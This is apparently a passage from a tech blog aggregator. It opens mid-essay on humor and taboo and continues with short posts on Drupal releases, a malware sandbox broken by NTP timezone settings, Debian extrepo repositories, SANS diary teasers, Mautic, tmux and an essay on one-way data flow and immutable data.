What's more interesting is how this scene was itself parodied in 2001's Not Another Teen Movie. There's a lot to say about that film, because it's a meticulous fusion of 1980s and 1990s teenage movie tropes. It takes itself not seriously by taking the source material very seriously, with stellar performances. The opening is a direct homage to American Pie, which turns everything about that scene to 11, and exaggerates beyond proportion:

It makes perfect sense when you consider what the common objection was at the time: on-screen teenage sexuality and an acknowledgement of taboo hormonal urges. Instead of a shy nerdy guy with a sock, we have a fearless girl with a comically large pink vibrator. Everyone walks in on it, even grandma and the local pastor. It ends with a whipped cream bukkake, cue the opening titles. The rest of the movie continues this line of subverting source material while throwing in a heavy dose of potty, sex and other gags. It only misses the mark a few times, really, like when it tries to stretch a Token Black Character joke for the entire movie.

If you thought the butt of this was women, or LGBTs, or black people, you'd be missing the point entirely. It was a middle finger aimed at puritan scolds who also spent their time chastising alien sideboob in video games they had never even played.

Most importantly, audiences thought it was genuinely hilarious.

The Humorton Window

I've mostly stuck to examples that feel dated now, and in the first case, downright provincial.

Jokes about national rivalry have diminished, for the simple reason that the unknown has diminished. After opening European borders, and harmonizing the economic and legal systems, we have a legible continent where countries can easily and freely compare notes. We don't need to joke about who would run things best anymore, we can just go look at the COVID numbers.

When you still encounter this sort of national humor, it's more in the context of April Fools or "shitposting", like the pair of dueling memes:

G E K O L O N I Z E E R D (Colonized)
G E F E D E R A L I Z E E R D (Federalized)

Usually posted by a Dutchman or a Belgian respectively, referring to Dutch imperialism and Belgian bureaucracy, to signify that one demographic seems particularly dominant in a thread or space. It is only properly used when ironic; otherwise it is simply tiresome.jpg.

Sexual humor has also reduced in relevance, because the internet offers unlimited access to both pornography and genuine sex-ed, removing all the basic taboos around it. Rather than a bunch of confused college dudes wondering exactly how gay sex works, you now have guys who tried watching some of it, didn't get aroused by it, and simply moved on.

There are shifting windows of what it is a) acceptable and b) popular to laugh at. There's also a saying, "To learn who rules over you, simply find out who you are not allowed to criticize." This counts doubly so for "or joke about."

This is commonly and falsely attributed to Voltaire but oddly enough appears to originate from a 1993 essay by an actual, genuine, bona fide white nationalist. TIL.

The question of who said it is of course irrelevant, the question is whether it is true or not. A common refutation is that it is disallowed to mock e.g. the mentally disabled, who clearly do not rule over others. But that's a cop out, because doing so lures out those who do have power to punish people for it, namely all sorts of organizations that ostensibly advance the rights of particular groups.

The problem with this system is that it is driven by attention, not by effectiveness. This is described perfectly in the essay The Toxoplasma of Rage, written by recently unmasked blogger Scott Alexander Ocasio-Cortez. When the actions that are rewarded are those that get the most attention, this tends to amplify rather than reduce tensions between different interest groups, by breeding more resentment.

It also tends to confuse the people who already have means and access with those with need of it. As an example of this dynamic, there was a story here a few years ago: an elderly Jewish woman in distress had called a stand-by nurse (iirc). Upon learning that she was Jewish, the nurse scolded her for the collective sins of Israel against Palestine and was rude and unhelpful. I know about this because the next day it was in every major newspaper, after being highlighted by a Jewish interest organization.

The outcome would be very different if e.g. someone was mistreated because they were homeless or a drug addict. It would be pretty much impossible for someone like that to get any serious restitution or acknowledgement here. Whether you call that being in charge or not, it represents two vastly different tiers of access and service, differentiated purely by whom you are not allowed to generalize against.

Another common refutation of not-Voltaire is the success of comedians like Dave Chappelle or Bill Burr, who both brought new material highly critical of cancel culture and organized "alphabet people" (LGBTQIAA2+). They invited prophesied professional and personal doom, but came out more popular than ever. Ricky Gervais' near-annual Golden Globes speeches are in a similar vein, with the recurring gag that he'll never be invited again, as he roasts some of the wealthiest people to their faces:

Many correctly point out that none of the comedians' careers or lifestyles are in danger. They are multi-millionaires with successful projects under their belts. That is of course why they get to do it. When people who don't have "fuck you money" or big brass balls crack jokes like that, they make themselves a target, and those with means and motive go in for the kill. The saying is of course "find out who rules over you," not over them.


I find this fascinating because it reveals humor as a sort of "Romulan Neutral Zone" on the edge of the usual political Overton Window. This larger zone covers not just what is acceptable, but also what is currently contested. The jokes are the ammo, but the armor is self-confidence derived from skill and success. Comedians play this game on Nightmare difficulty every show night.

This zone consists of ideas which humor is effective at working its magic on. It alters or refutes our worldview with condensed bursts of hidden wisdom or absurdity. But they must be within our grasp to untangle. Humor's range is subject to its own constraints, such as "Too Soon", "That's NOT Funny", "I'm Going To Hell For Laughing" and "I Don't Get It". These are completely subjective limits, which are negotiated and renegotiated between the joke tellers and their audience. If you don't believe me, take the joke about the 51 straws, and replace "Dutch" with "Jewish".

But if you think that means the Jews rule over you, you're refusing to see how these things actually work. What actually rules over you is people's chronic and miscalibrated fear that you might not be kidding, which occurs in highly variable degrees. This might also be a good explanation for the common saying that if you want to tell people something they don't want to hear, you need to make them laugh, or they'll kill you for saying it. Good humor is a successful mental defense against thinking that is too rigid and dogmatic.

The case of Mark Meechan is highly illustrative. This is the Scot who was convicted of "grossly offensive behavior" for teaching his pug-dog to do a Nazi salute, upon hearing "Gas the Jews". He has always claimed he did it purely to annoy his girlfriend. "Justice" in this case includes a court ruling that "context and intent" are officially irrelevant to the matter, an absolute bombshell in legal precedent. But that's not the most absurd part. It's the BBC documentary on the issue afterwards, in which one of the detractors jokingly asks his own cat if it too wants to "Gas the Jews," before concluding no. By the logic of a British court, he is guilty of the same kind of punishable offense, and the video is the only proof necessary.

They looked at a person whose only crime was to make jokes they found offensive, and they thought this made him a credible threat to their entire way of life. In their panicked response, they actually started destroying one of the fundamental foundations of that way of life. They haven't stopped yet.

It's a joke, but the penny has yet to drop.

* * *

Humor seems to be far from just a random evolutionary quirk, or a meaningless pass-time. It is a fundamental mechanism that we individually and collectively use to sanity check ourselves. Humor highlights the boundaries of where we might be wrong, and it helps us cut through hangups and taboo.

It seems to happen when a joke activates surprising and contradictory signals, all at the same time. If we can successfully resolve them using our larger understanding of the world, we can acknowledge something new and true. This also implies that when humor-police shows up, they are a symptom of a collective lack of understanding and of unacknowledged taboos.

When we ban fun and mockery, we ban challenging insights, and we do so at our own peril.

Cover Image - Chad and Virgin Laughing

Do not assume the US still aspires to be a world leader. Put differently: it is time for an EU army.

She also said: the UK will have to “live with the consequences” of Boris Johnson  ditching Theresa May’s plan to maintain close economic ties with the EU after Brexit.

Asked whether a no-deal Brexit would be a personal defeat for her: No. It would, of course, be in Britain's and all EU member states' interests to achieve an orderly departure. But that can only happen if it is what both sides want.

Her Germany is ready, no matter what. She made it so. And she's telling you.

June 26, 2020

I get eaten by the worms and … For 2 seconds the drums seem to announce this is just a cover, but then the beat changes drastically and you're left wondering what happened while the different vibe grows on you. You (almost) have goosebumps when the bridge happens and you stop breathing to hear it all, and then, after that bridge, everything comes together and you're floating on those familiar minor 9th chord arpeggios and those fabulous voices until all fades out and you hit repeat.


As part of the cron.weekly newsletter, I want to test the plain-text version of the mail as much as possible.

June 25, 2020

Given the impact of COVID-19 on organizations' budgets, we extended Drupal 7's end-of-life date by one year. Drupal 7 will receive security updates until November 2022, instead of November 2021. For more information, see the official announcement.

Extending the lifetime of Drupal 7 felt like the right thing to do. It's aligned with Drupal's goal to build software that is safe for everyone to use.

I wish more software was well-maintained like Drupal is. We released Drupal 7 almost a decade ago and continue to care for it.

We often recognize those who help innovate or introduce new features. But maintaining existing Open Source software also relies on the contributions of individuals and organizations. Today, I'd like us to praise those who maintain and improve Drupal 7. Thank you!

June 17, 2020

While it’s common to say that “Everything is a Freaking DNS problem“, other protocols can also be the source of problems… NTP (“Network Time Protocol”) is a good candidate too! A best practice is to synchronize all your devices via NTP, but also to set the same timezone everywhere! We learn by making mistakes, and I wanted to share this one with you.

After spending time debugging, I finally found why many of the automated submissions to my malware analysis Sandbox failed. It was due to the timezone and… NTP!

When you prepare a Sandbox system, it must be based on guest images. These images have to reflect your “environment”: your usual tools must be installed (Microsoft Office, a PDF reader, a browser, etc.). To achieve this, I usually start from a standard Windows image that I clone and then fine-tune to match my requirements. The problem is that, by default, the Windows operating system synchronizes itself automatically with the Microsoft NTP servers:

How is the guest image used by the Sandbox system? When your environment is ready, you take a snapshot. Later, to analyze a malicious file, the Sandbox restores the snapshot, copies the file to it, and executes it. The snapshot being a “picture” of the system, the date & time are also frozen and, when you restore it, the clock continues to run from the time the snapshot was taken. That’s why the Sandbox must update the time:

2020-06-04 11:48:17,428 [root] INFO: Date set to: 20200615T00:31:18, timeout set to: 300

(Note that it’s a classic feature. Some malware must be analyzed at a specific time or date to ensure that it will execute properly!)

My last snapshot was created on 2020/06/04 11:48:17 and the analysis started on 2020/06/15 00:31:18:

2020-06-15 00:31:18,734 [root] DEBUG: Starting analyzer from: C:\tmpv556hytw
2020-06-15 00:31:18,734 [root] DEBUG: Storing results at: C:\FMiZIvH
2020-06-15 00:31:18,734 [root] DEBUG: Pipe server name: \\.\PIPE\nRwJWEHQaG
2020-06-15 00:31:18,734 [root] DEBUG: Python path: C:\Users\user01\AppData\Local\Programs\Python\Python38-32
2020-06-15 00:31:18,734 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-15 00:31:18,734 [root] INFO: Automatically selected analysis package "exe"

But suddenly, I saw this in the log:

2020-06-15 00:31:31,359 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00860000.
2020-06-15 02:32:18,074 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-15 02:32:18,074 [lib.api.process] ERROR: Failed to open terminate event for pid 3392
2020-06-15 02:32:18,074 [root] INFO: Terminate event set for process 3392.
2020-06-15 02:32:18,074 [root] INFO: Created shutdown mutex.
2020-06-15 02:32:19,073 [root] INFO: Shutting down package.
2020-06-15 02:32:19,073 [root] INFO: Stopping auxiliary modules.

You can see that, suddenly, the system time was 2h ahead (00:31 to 02:32) and the Sandbox triggered a timeout and stopped the analysis. Why?

The Sandbox is running in UTC (tip: it’s always good to use UTC as the standard timezone to avoid issues when correlating events) but my original Windows guest was running in the CET timezone (UTC+2 with summer time) and NTP synchronization had been left configured by default. When the snapshot is restored, the operating system runs as usual and, at regular intervals, synchronizes its internal clock via NTP…
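As a minimal sketch (not from the original post), the roughly two-hour wall-clock jump can be reproduced with Python's datetime module: the guest's NTP resync didn't change the instant in time, only the wall clock, because the snapshot was taken in CEST (UTC+2) while the Sandbox set the clock in UTC.

```python
from datetime import datetime, timedelta, timezone

# The Sandbox sets the clock in UTC, but the guest snapshot was taken in
# CEST (Central European Summer Time, UTC+2). When the guest's NTP client
# resyncs, the wall clock jumps by the zone offset.
CEST = timezone(timedelta(hours=2))

t_sandbox = datetime(2020, 6, 15, 0, 31, 18, tzinfo=timezone.utc)
t_after_sync = t_sandbox.astimezone(CEST)  # same instant, CEST wall clock

print(t_after_sync.strftime("%H:%M:%S"))  # 02:31:18 -> the ~2h jump in the log
```

Note that the two values describe the same instant; only the displayed time differs, which is exactly why the analyzer believed its 300-second timeout had long expired.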

Conclusion: do NOT configure NTP in your Sandbox guest images, to save yourself some headaches with broken analyses!
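One practical way to do that on a Windows guest (a sketch using the standard w32tm/sc tooling, not taken from the original post; verify against your Windows version) is to stop and disable the Windows Time service before taking the snapshot:

```batch
:: Sketch: disable NTP synchronization in a Windows guest before snapshotting.
:: Run in an elevated command prompt.
w32tm /config /syncfromflags:manual
net stop w32time
sc config w32time start= disabled
```

With the service disabled, the restored snapshot keeps whatever time the Sandbox sets, instead of silently resyncing mid-analysis.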

[The post When NTP Kills Your Sandbox was first published on /dev/random]

Just over 7 months ago, I blogged about extrepo, my answer to the "how do you safely install software on Debian without downloading random scripts off the Internet and running them as root" question. I also held a talk during the recent "MiniDebConf Online" that was held, well, online.

The most important part of extrepo is "what can you install through it". If the number of available repositories is too low, there's really no reason to use it. So, I thought, let's look what we have after 7 months...

To cut to the chase, there's a bunch of interesting content there, although not all of it has a "main" policy. Each of these can be enabled by installing extrepo, and then running extrepo enable <reponame>, where <reponame> is the name of the repository.

Note that the list is not exhaustive, but I intend to show that even though we're nowhere near complete, extrepo is already quite useful in its current state:

Free software

  • The debian_official, debian_backports, and debian_experimental repositories contain Debian's official, backports, and experimental repositories, respectively. These shouldn't have to be managed through extrepo, but then again it might be useful for someone, so I decided to just add them anyway. The config here uses the alias for CDN-backed package mirrors.
  • The belgium_eid repository contains the Belgian eID software. Obviously this is added, since I'm upstream for eID, and as such it was a large motivating factor for me to actually write extrepo in the first place.
  • elastic: the elasticsearch software.
  • Some repositories, such as dovecot, winehq and bareos, contain upstream versions of their respective software. These repositories contain software that is available in Debian, too; but their upstreams package their most recent releases independently, and some people might prefer to run those instead.
  • The sury, fai, and postgresql repositories, as well as a number of repositories such as openstack_rocky, openstack_train, haproxy-1.5 and haproxy-2.0 (there are more), contain more recent versions of software already packaged in Debian. For the sury repository, that is PHP; for the others, the name should give it away.

    The difference between these repositories and the ones above is that it is the official Debian maintainer for the same software who maintains the repository, which is not the case for the others.

  • The vscodium repository contains the unencumbered version of Microsoft's Visual Studio Code; i.e., the codium version of Visual Studio Code is to code as the chromium browser is to chrome: it is a build of the same software, but without the non-free bits that make code not entirely Free Software.
  • While Debian ships with at least two browsers (Firefox and Chromium), additional browsers are available through extrepo, too. The iridiumbrowser repository contains a Chromium-based browser that focuses on privacy.
  • Speaking of privacy, perhaps you might want to try out the torproject repository.
  • For those who want to do Cloud Computing on Debian in ways that aren't covered by Openstack, there is a kubernetes repository that contains the Kubernetes stack, as well as the google_cloud one containing the Google Cloud SDK.

Non-free software

While these are available to be installed through extrepo, please note that non-free and contrib repositories are disabled by default. In order to use these repositories, you must first enable them; this can be accomplished through /etc/extrepo/config.yaml.

  • In case you don't care about freedom and want the official build of Visual Studio Code, the vscode repository contains it.
  • While we're on the subject of Microsoft, there's also Microsoft Teams available in the msteams repository. And, hey, skype.
  • For those who are not satisfied with the free browsers in Debian or any of the free repositories, there's opera and google_chrome.
  • The docker-ce repository contains the official build of Docker CE. While this is the free "community edition" that should have free licenses, I could not find a licensing statement anywhere, and therefore I'm not 100% sure whether this repository is actually free software. For that reason, it is currently marked as a non-free one. Merge Requests for rectifying that from someone with more information on the actual licensing situation of Docker CE would be welcome...
  • For gamers, there's Valve's steam repository.

Again, the above lists are not meant to be exhaustive.

Special thanks go out to Russ Allbery, Kim Alvefur, Vincent Bernat, Nick Black, Arnaud Ferraris, Thorsten Glaser, Thomas Goirand, Juri Grabowski, Paolo Greppi, and Josh Triplett, for helping me build the current list of repositories.

Is your favourite repository not listed? Create a configuration based on template.yaml, and file a merge request!

June 16, 2020

I published the following diary on “Sextortion to The Next Level“:

For a long time, our mailboxes have been flooded with emails from “hackers” (note the quotes) who pretend to have infected our computers with malware. The scenario is always the same: they successfully collected sensitive pieces of evidence about us (usually, men visiting adult websites) and request some money to be paid in Bitcoins or they will disclose everything. We first reported this kind of malicious activity in 2018. Attacks evolved with time and the attackers improved their communication by adding sensitive information like a real password (grabbed from major data leaks) or mobile phone numbers… [Read more]

[The post [SANS ISC] Sextortion to The Next Level has been first published on /dev/random]

Mautic released

A year ago, Acquia acquired Mautic. Mautic is an Open Source marketing automation and campaign management platform.

Some of you have been wondering: what has been going on since the acquisition? It's high time for an update!

Mautic 3 released

Mautic 3 was released last night. It is the first major release in four years, and a big milestone!

I'd like to extend a big thank you to everyone who contributed to Mautic 3. I'm also proud to say that Acquia was the largest contributor.

For me personally, it was nice to see some long-term Drupal developers contribute to Mautic 3. When Acquia acquired Mautic, I hoped to see cross-pollination between Drupal and Mautic.

A streamlined release model for Mautic 4

The Mautic 3 release was mostly an "under the hood" release. The focus was on upgrading and modernizing Mautic's underlying frameworks (e.g. Symfony and other dependencies).

We want Mautic 4 to offer some much-requested new features. In order to do so, Mautic is switching to a new innovation and release model. Instead of having to wait almost four years for a major release with new features, there will be four Mautic releases with new features each year.

The Drupal community went through a similar transformation five years ago. The Drupal community now brings more value to its users in less time. Because of the faster innovation cycle, Drupal also has more active contributors than ever before.

A quarterly release cycle creates a healthy heartbeat for an Open Source project. You can expect Mautic to deliver improvements more frequently and predictably moving forward.

A streamlined governance model

As a young Open Source project, Mautic was lacking clearly defined roles and responsibilities. For example, it was unclear to many (including me) how the Open Source project and Mautic, Inc., the for-profit company, best collaborated.

With the acquisition by Acquia, the need for clear roles and responsibilities became even more pressing.

One of the first things Acquia did post-acquisition was to develop a new governance model in collaboration with the Mautic community.

Mautic's new governance model defines different teams and working groups, how the community and Acquia collaborate, and more. With roles and responsibilities more clearly defined, we can go faster together.

A new project lead

I'm also excited to share that Ruth Cheesley is Mautic's new Project Lead.

Ruth has been involved with Mautic for a long time, and prior to Mautic, was on Joomla!'s Community Leadership Team. She is also a member of Drupal's Community Working Group. Ruth works at Acquia. As she is part of my team, I've been working closely with Ruth for the past 6+ months and could not be more excited about her involvement and new role.

Ruth has the full support of Acquia, Mautic's community leadership team, and DB Hurley, Mautic's founder and previous Project Lead. A big thank you to DB for his leadership and having guided Mautic thus far — getting an Open Source project off the ground and to this stage is no small feat.


With a new governance model, leadership structure, as well as a new release and innovation model for Mautic, we're set up well to accelerate and innovate for the long run.

June 13, 2020

bulky T510 and tiny n135

When my Thinkpad x250 broke down last week with what appears to be a motherboard failure, I tried to convince my daughter to hand over her T410, but work-from-home-schooling does not work without a computer, so she refused. Disillusioned in my diminishing parenting powers, I dug up my 10 year old Samsung n135 netbook instead. It still had Ubuntu 14.10 running and the battery was pining for the fjords, but after buying a new battery (€29), updating Ubuntu to 18.04 LTS and switching to Lubuntu it really is usable again.

Now to be honest, I did get a replacement laptop (a bulky T510 with only 4GB of RAM) with my own SSD inside from my supplier, so I’m not using that old netbook full-time, but I’m happy to have it running smoothly nonetheless.

The future, to end this old-fashioned geekery with, will very likely be a Dell XPS-13 9300 (yep, I’ll be cheating on Lenovo) on which I’ll happily install Ubuntu 20.04 LTS. I’ve upgraded my wife’s x240 to that already and I must say it runs smoothly and looks great compared to 18.04, which I’m still running.

June 12, 2020

I published the following diary on “Malicious Excel Delivering Fileless Payload“:

Macros in Office documents are so common today that my honeypots and hunting scripts catch a lot of them daily. I try to keep an eye on them because sometimes you can spot an interesting one (read: “using a less common technique”).  Yesterday, I found such a sample that deserve a quick diary… [Read more]

[The post [SANS ISC] Malicious Excel Delivering Fileless Payload has been first published on /dev/random]

June 11, 2020

I published the following diary on “Anti-Debugging JavaScript Techniques“:

For developers who write malicious programs, it’s important to make their code hard to read and to execute in a sandbox. Like most languages, JavaScript offers many ways to make the life of malware analysts more difficult (or more exciting, depending on the side of the table you’re sitting on ;-).

Besides being an extremely permissive language with its syntax and making it easy to obfuscate, JavaScript can also implement anti-debugging techniques. A well-known technique is based on the method arguments.callee(). This method allows a function to refer to its own body… [Read more]

[The post [SANS ISC] Anti-Debugging JavaScript Techniques has been first published on /dev/random]

If you’re a bit like me, you’re probably impatient. You want things to move quickly. There’s no time to waste!

June 09, 2020

After more than 2 years of building Oh Dear, I still struggle with the most fundamental question: how are users finding our application and where should we focus our marketing efforts to maximize that?

June 07, 2020

tmux upgrade from 2.8 to 3.0...

# invisible separators
set-option -g pane-border-fg black
set-option -g pane-border-bg black
set-option -g pane-active-border-fg black
set-option -g pane-active-border-bg black

became:

set -g pane-border-style bg=black,fg=black
set -g pane-active-border-style bg=black,fg=black

as mentioned in the changelog.

June 04, 2020

I published the following diary on “Anti-Debugging Technique based on Memory Protection“:

Many modern malware samples implement defensive techniques. First of all, we have to distinguish sandbox-evasion and anti-debugging techniques. Today, sandboxes are an easy and quick way to categorize samples based on their behavior. Malware developers have plenty of tests to perform to detect the environment running their code. There are plenty of them, some examples: testing the disk size, the desktop icons, the uptime, processes, network interfaces MAC addresses, hostnames, etc… [Read more]

[The post [SANS ISC] Anti-Debugging Technique based on Memory Protection has been first published on /dev/random]

This post shares some ideas about working with cronjobs, to help make common tasks easier for both junior and senior sysadmins.

June 03, 2020

Today, we released Drupal 9.0.0! This is a big milestone because we have been working on Drupal 9 for almost five years.

I updated my site to run Drupal 9 earlier today. It was easy!

As I write this, I'm overwhelmed by feelings of excitement and pride. There is something very special about building and releasing software with thousands of people around the world.

However, I find myself conflicted between today's successful launch and the tragic events in the United States. I can't go about business as usual. Discrimination is the greatest threat to any community, Drupal included.

I have always believed that Drupal is a force for good in the world. People point to our community as one of the largest, most diverse and most supportive Open Source projects in the world. While we make mistakes and can always be better, it's important that we lead by example. That starts with me. I am committing to the community that I will continue to learn more, and fight for equality and justice. I can and will do more. Above all else, it's important to stand in solidarity with Black members of the Drupal community — and the Black community at large.

During this somber time, I remain incredibly proud of our community for delivering Drupal 9. We did this together, as a global community made up of people from different races, ethnicities, genders, and national origins. It gives me some needed positivity.

If you haven't looked at Drupal in a while, I recommend you look again. Compared to Drupal 8.0.0, Drupal 9 is more usable, accessible, inclusive, flexible, and scalable. We made so much progress on such important things:

  • Drupal 9 is dramatically easier to use for marketers
  • Drupal 9 is easier to maintain and upgrade for developers
  • Drupal is innovating with its headless or decoupled capabilities

It's hard to describe the amount of innovation and care that went into Drupal since the first release of Drupal 8 almost five years ago. To try and grasp the scale, consider this: more than 4,500 individuals contributed to Drupal core during the past 4.5 years. During that time, the number of active contributors increased by almost 50%. Together, we created the most author-friendly and powerful version of Drupal to date.

Thank you to everyone who made Drupal 9 happen.

June 02, 2020

... isn't ready yet, but it's getting there.

I had planned to release a new version of SReview, my online video review and transcoding system that I wrote originally for FOSDEM but is being used for DebConf, too, after it was set up and running properly for FOSDEM 2020. However, things got a bit busy (both in my personal life and in the world at large), so it fell a bit by the wayside.

I've now also been working on things a bit more, in preparation for an improved administrator's interface, and have started implementing a REST API to deal with talks etc through HTTP calls. This seems to be coming along nicely, thanks to OpenAPI and the Mojolicious plugin for parsing that. I can now design the API nicely, and autogenerate client side libraries to call them.

While at it, because libmojolicious-plugin-openapi-perl isn't available in Debian 10 "buster", I moved the docker containers over from stable to testing. This revealed that both bs1770gain and inkscape changed their command line incompatibly, resulting in me having to work around those incompatibilities. The good news is that I managed to do so in a way that keeps running SReview on Debian 10 viable, provided one installs Mojolicious::Plugin::OpenAPI from CPAN rather than from a Debian package. Or installs a backport of that package, of course. Or, heck, uses the Docker containers in a kubernetes environment or some such -- I'd love to see someone use that in production.

Anyway, I'm still finishing the API, and the implementation of that API and the test suite that ensures the API works correctly, but progress is happening; and as soon as things seem to be working properly, I'll do a release of SReview 0.6, and will upload that to Debian.

Hopefully that'll be soon.

June 01, 2020

I created a PHP package that can make it easier to work with percentages in any PHP application.

May 28, 2020

The reason software isn't better is because it takes a lifetime to understand how much of a mess we've made of things, and by the time you get there, you will have contributed significantly to the problem.
Two software developers pairing up on a Rails app

The fastest code is code that doesn’t need to run, and the best code is code you don’t need to write. This is rather obvious. Less obvious is how to get there. Every coder has their favored framework or language, their favored patterns and practices. Advice on what to do is easy to find. More rare is what not to do. They’ll often say "don’t use X, because of Y," but that’s not so much advice as it is a specific criticism.

The topic interests me because significant feats of software engineering often don't seem to revolve around new ways of doing things. Rather, they involve old ways of not doing things. Constraining your options as a software developer often enables you to reach higher than if you hadn't.

Many of these lessons are hard learned, and in retrospect often come from having tried to push an approach further than it merited. Some days much of software feels like this, as if computing has already been pushing our human faculties well past the collective red line. Hence I find the best software advice is often not about code at all. If it's about anything, it's about data, and how you organize it throughout its lifecycle. That is the real currency of the coder's world.

Usually data is the ugly duckling, relegated to the role of an unlabeled arrow on a diagram. The main star is all the code that we will write, which we draw boxes around. But I prefer to give data top billing, both here and in general.

One-way Data Flow

In UI, there's the concept of one-way data flow, popularized by the now omnipresent React. One-way data flow is all about what it isn't, namely not two-way. This translates into benefits for the developer, who can reason more simply about their code. Unlike traditional Model-View-Controller architectures, React is sold as being just the View.

Expert readers however will note that the original trinity of Model-View-Controller does all flow one way, in theory. Its View receives changes from the Model and updates itself. The View never talks back to the model, it only operates through the Controller.

model view controller

The reason it's often two-way in practice is because there are lots of M's, V's and C's which all need to communicate and synchronize in some unspecified way:

model view controller - data flow

The source of truth is some kind of nebulous Ur-Model, and each widget in the UI is tied to a specific part of it. Each widget has its own local model, which has to bi-directionally sync up to it. Children go through their parent to reach up to the top.

When you flatten this, it starts to look more like this:

model view controller - 2-way data flow

Between an original model and a final view must sit a series of additional "Model Controllers" whose job it is to pass data down and to the right, and vice versa. Changes can be made in either direction, and there is no single source of truth. If both sides change at the same time, you don't know which is correct without more information. This is what makes it two-way.

model view controller - one-way stateless data flow

The innovation in one-way UI isn't exactly to remove the Controller, but to centralize it and call it a Reducer. It also tends to be stateless, in that it replaces the entire Model for every change, rather than updating it in place.

This makes all the intermediate arrows one-way, restoring the original idea behind MVC. But unlike most MVC, it uses a stateless function f: model => views to derive all the Views from the Ur-Model in one go. There are no permanent Views that are created and then set up to listen to an associated Model. Instead Views are pure data, re-derived for every change, at least conceptually.
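The loop described above can be sketched in a few lines of TypeScript. Note this is a hypothetical miniature, not React's actual API: a stateless Reducer replaces the whole Model for every action, and a pure function f: model => views derives the Views from it as plain data.

```typescript
// One-way data flow in miniature (hypothetical names, not React's API).

type Model = { count: number };
type Action = { type: "increment" } | { type: "reset" };

// The Reducer: stateless — it returns a brand-new Model instead of
// updating the old one in place.
function reduce(model: Model, action: Action): Model {
  switch (action.type) {
    case "increment": return { count: model.count + 1 };
    case "reset":     return { count: 0 };
  }
}

// f: model => views — the View is pure data, re-derived on every change.
function render(model: Model): string {
  return `<span>${model.count}</span>`;
}

// The only place the flow loops back to the start: dispatching an action.
let model: Model = { count: 0 };
model = reduce(model, { type: "increment" });
model = reduce(model, { type: "increment" });
console.log(render(model)); // prints "<span>2</span>"
```

Because `reduce` never mutates its input, every intermediate arrow stays one-way: changes enter only through actions, and views only ever flow out.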

In practice there is an actual trick to making this fast, namely incrementalism and the React Reconciler. You don't re-run everything, but you can pretend you do. A child is guaranteed to be called again if a parent has changed. But only after giving that parent, and its parents, a chance to react first.

Even if the Views are a complex nested tree, the data flow is entirely one way except at the one point where it loops back to the start. If done right, you can often shrink the controller/reducer to such a degree that it may as well not be there.

Much of the effort in developing UI is not in the widgets but in the logic around them, so this can save a lot of time. Typical MVC instead tends to spread synchronization concerns all over the place as the UI develops, somewhat like a slow but steadily growing cancer.

The solution seems to be to forbid a child from calling or changing the state of its parent directly. Many common patterns in old UI code become impossible and must be replaced with alternatives. Parents do often pass down callbacks to children to achieve the same thing by another name. But this is a cleaner split, because the child component doesn't know who it's calling. The parent can decide to pass-through or decorate a callback given to it by its parent, and this enables all sorts of fun composition patterns with little to no boilerplate.

You don't actually need to have one absolute Ur-Model. Rather the idea is separation of concerns along lines of where the data comes from and what it is going to be used for, all to ensure that change only flows in one direction.

The benefits are numerous because of what it enables: when you don't mutate state bidirectionally, your UI tree is also a data-dependency graph. This can be used to update the UI for you, requiring you to only declare what you want the end result to be. You don't need to orchestrate specific changes to and fro, which means a lot of state machines disappear from your code. Key here is the ability to efficiently check for changes, which is usually done using immutable data.
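That last point deserves a small sketch (the `Todo` and `renderList` names are hypothetical): when versions of the data are never mutated in place, "did anything change?" collapses to a single reference comparison, which is what lets a framework skip re-deriving unchanged parts of the UI.

```typescript
// Cheap change detection via immutability: same reference => unchanged.

type Todo = { label: string; done: boolean };

let lastInput: Todo[] | undefined;
let lastOutput = "";
let renders = 0;

function renderList(todos: Todo[]): string {
  if (todos === lastInput) return lastOutput; // O(1) check, no deep compare
  renders++;
  lastInput = todos;
  lastOutput = todos.map(t => `[${t.done ? "x" : " "}] ${t.label}`).join("\n");
  return lastOutput;
}

const v1: Todo[] = [{ label: "ship it", done: false }];
renderList(v1);
renderList(v1); // cache hit: identical reference, no work done

// An "edit" produces a new array; the old version is left untouched.
const v2 = [...v1, { label: "test it", done: false }];
renderList(v2);
console.assert(renders === 2); // only two real renders happened
```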

The merit of this approach is most obvious once you've successfully built a complex UI with it. The discipline it enforces leads to more elegant and robust solutions, because it doesn't let you wire things up lazily. You must instead take the long way around, and design a source of truth in accordance with all its intended derivatives. This forces but also enables you to see the bigger picture. Suddenly features that seemed insurmountably complicated, because they cross-cut too many concerns, can just fall out naturally. The experience is very similar to Immediate Mode UI, only with the ability to decouple more and do async.

If you don't do this, you end up with the typical Object-Oriented system. Every object can be both an actor and can be mutually acted upon. It is normal and encouraged to create two-way interactions with them and link them into cycles. The resulting architecture diagrams will be full of unspecified bidirectional arrows that are difficult to trace, which obscure the actual flows being realized.

Unless they represent a reliable syncing protocol, bidirectional arrows are wishful thinking.

Immutable Data

Almost all data in a computer is stored on a mutable medium, be it a drive or RAM. As such, most introductions to immutable data will preface it by saying that it's kinda weird. Because once you create a piece of data, you never update it. You only make a new, altered copy. This seems like a waste of perfectly good storage, volatile or not, and contradicts every programming tutorial.

Because of this it is mandatory to say that you can reduce the impact of it with data sharing. This produces a supposedly unintuitive copy-on-write system.

But there's a perfect parallel, and that's the pre-digital office. Back then, most information was kept on paper that was written, typed or printed. If a document had to be updated, it had to be amended or redone from scratch. Aside from very minor annotations or in-place corrections, changes were not possible. When you did redo a document, the old copy was either archived, or thrown away.

data sharing - copy on write
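As a sketch of how data sharing keeps copy-on-write affordable (minimal hypothetical types, not any particular library): an "update" to an immutable list copies only the spine up to the change and shares everything after it, so old and new versions coexist cheaply.

```typescript
// Structural sharing: new versions reuse the untouched tail of old ones.

type Node<T> = { value: T; next: Node<T> | null };

const cons = <T>(value: T, next: Node<T> | null): Node<T> => ({ value, next });

// "Replace" the element at index i by copying only the nodes before it.
function setAt<T>(list: Node<T> | null, i: number, value: T): Node<T> | null {
  if (list === null) return null;
  if (i === 0) return cons(value, list.next); // share the entire tail
  return cons(list.value, setAt(list.next, i - 1, value));
}

const v1 = cons(1, cons(2, cons(3, null)));
const v2 = setAt(v1, 0, 9)!;

// Both versions coexist; the old "paper" copy is still intact...
console.assert(v1.value === 1 && v2.value === 9);
// ...and v2 physically shares v1's tail instead of copying it.
console.assert(v2.next === v1.next);
```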

The perfectly mutable medium of computer memory is a blip, geologically speaking. It's easy to think it only has upsides, because it lets us recover freely from mistakes. Or so we think. But the same needs that gave us real life bureaucracy re-appear in digital form. Only it's much harder to re-introduce what came naturally offline.

